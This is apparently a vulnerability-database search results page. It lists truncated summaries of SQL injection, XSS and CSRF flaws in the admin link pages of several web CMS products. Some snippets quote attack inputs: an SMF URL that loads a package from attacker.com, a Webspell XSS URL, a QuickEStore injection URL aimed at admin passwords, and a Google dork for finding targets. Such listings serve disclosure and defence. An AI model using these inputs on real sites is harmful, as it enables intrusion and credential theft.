32 matches found
Luocms SQL注入漏洞
Luocms is an article management system. A SQL injection vulnerability exists in Luocms v2.0, which stems from a lack of validation of external input SQL statements in /admin/link/linkok.php. An attacker could use this vulnerability to execute illegal SQL commands to steal sensitive database data...
CVE-2022-24604
Luocms v2.0 is affected by SQL Injection in /admin/link/linkmod.php...
CVE-2020-21505
waimai Super Cms 20150505 contains a cross-site scripting XSS vulnerability in the component /admin.php/Link/addsave...
YUNUCMS cross-site scripting vulnerability (CNVD-2018-23273)
YUNUCMS is a three-network, self-substation system of open source content management system. YUNUCMS 1.1.5 in admin/link/editlink?id=5 cross-site scripting vulnerability, attackers can exploit the vulnerability to carry out cross-site attacks...
SEMCMS Cross-Site Scripting Vulnerability (CNVD-2019-01723)
SEMCMS is a foreign trade web content management system CMS that supports multiple languages. A cross-site scripting vulnerability exists in SEMCMS version 3.4, which can be exploited by a remote attacker to inject arbitrary web script or HTML with the help of the first input field of...
SQL Injection Vulnerability in MIPCMS ApiAdminLink.php Page
MIPCMS is a free and open source based on Baidu Mobile Accelerator MIP engine based on the development of articles, information, content management system, but also the system for the Internet webmasters, entrepreneurs and other groups to create SEO-optimized after the station-building system. A...
Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload
Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file: http://attacker.com/packages.xml Save this file as...
StatCounteX 3.0 & 3.1 Admin Vulnerability
StatCounteX 3.0 & 3.1 Admin Vulnerability No need to exploit ; An attacker can follow /admin.asp link and edit the scripts configurations google dork : intitle:StatCounteX 3.1 Yonetici SekoMirza From Turkiye !...
Webspell 4.01.02 2 Vulnerabilites
Webspell 4.01.02 2 Vulnerabilites Founded by NBBN Vendor: http://cms.webspell.org 1 Cross-Site Scripting Vulnerability 2 Change User Permission XSRF Vulnerability 1 http://site.tld/path/index.php?site=whoisonline&sort="xss code 2 This creates a superadmin account, when an admin click a link, to a...
CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability
Exploit for cgi platform in category web applications ================================================================== CartWeaver Details.cfm ProdID Remote SQL Injection Vulnerability ================================================================== product:CartWeaver main...
QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability
No description provided by source. author:meoconxatvnbrain.net web application:QuickEStore Main Page:www.quickestore.com bug: sql injection at insertorder.cfm?CFID=123&CFTOKEN=1' exploit: http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1sql query get admin password:...
CVE-2024-36674
LyLmespage v1.9.5 is vulnerable to Cross Site Scripting XSS via admin/link.php...